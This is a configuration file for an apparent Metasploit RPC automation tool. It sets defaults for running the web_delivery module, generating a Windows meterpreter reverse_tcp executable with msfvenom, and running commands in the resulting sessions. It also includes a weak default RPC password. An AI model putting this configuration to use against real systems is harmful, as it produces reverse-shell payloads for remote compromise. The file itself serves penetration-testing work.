[default]
# Global default settings for RPC connection
msf_password = msfrpc
rpc_server = 127.0.0.1
rpc_port = 55552
rpc_ssl = False

# Default regex for filtering exploit output
regex = Run the following command on the target machine:\n(.*)

[run_module]
# Default options for running Metasploit modules
module = exploit/multi/script/web_delivery
option1 = LHOST=192.168.1.100
option2 = LPORT=4444
# Specific regex can be defined here, if different from the global one
regex = Run the following command on the target machine:\n(.*)

[poll_jobs]
# Poll jobs doesn't require additional options, so just keep the connection defaults

[poll_sessions]
# Poll sessions doesn't require additional options, so just keep the connection defaults

[run_command]
# Default session command to run inside an active session
session_id = 1
session_command = sysinfo

[generate_payload]
# Default settings for generating payloads with msfvenom
format = exe
payload = windows/meterpreter/reverse_tcp
lhost = 192.168.1.100
lport = 4444
output_file = /tmp/payload.exe

